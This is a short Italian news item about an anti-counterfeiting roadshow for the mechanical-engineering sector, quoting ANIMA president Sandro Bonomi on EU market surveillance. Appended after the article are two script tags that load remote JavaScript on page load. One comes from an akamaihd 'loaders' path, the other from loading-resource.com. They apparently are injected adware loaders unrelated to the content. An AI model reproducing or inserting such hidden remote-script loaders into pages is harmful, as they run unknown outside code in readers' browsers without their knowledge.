1. Home
  2. Notizie e Mercato
  3. Anticontraffazione/Solo il controllo di mercato può salvare la Meccanica

Anticontraffazione/Solo il controllo di mercato può salvare la Meccanica

Macchine per costruzioni di
5/5
votato da 1 persone
BONOMI/Prevenzione a tutela della conformità alle norme UE: percorso obbligato per avere ancora una manifattura in Europa nel 2030


In occasione della seconda tappa del Roadshow “Lotta alla contraffazione e tutela della proprietà intellettuale: difendere e valorizzare l’attività d’impresa”, organizzato dalla Direzione Generale Lotta alla Contraffazione – UIBM del Ministero dello Sviluppo Economico, Federmacchine e ANIMA, e Confindustria, Sandro Bonomi, Presidente di ANIMA, Federazione delle Associazioni della Meccanica Varia e Affine, ha riaffermato la necessità di tutelare la manifattura meccanica nazionale:

Supportiamo al 100% le proposte che il Vice Presidente della Commissione Europea On. Tajani sta portando avanti in Europa relativamente alla sicurezza dei prodotti di consumo e alla vigilanza del mercato dei prodotti industriali. Mi auguro che la Commissione europea continui a monitorare il mercato sollecitando una sempre maggior attenzione degli attori in gioco e contribuendo a una educazione anche del cittadino nell’individuare i prodotti non conformi alle normative Europee. Non ho dubbi che solo a queste condizioni l’Europa possa far fronte alla contraffazione e vantare una manifattura meccanica anche nel 2030”.

Il prossimo appuntamento del roadshow dedicato alla meccanica si terrà a Milano il prossimo 21 novembre 2013 presso la sede ANIMA, Federazione delle Associazioni della Meccanica Varia e Affine.



<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script><script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>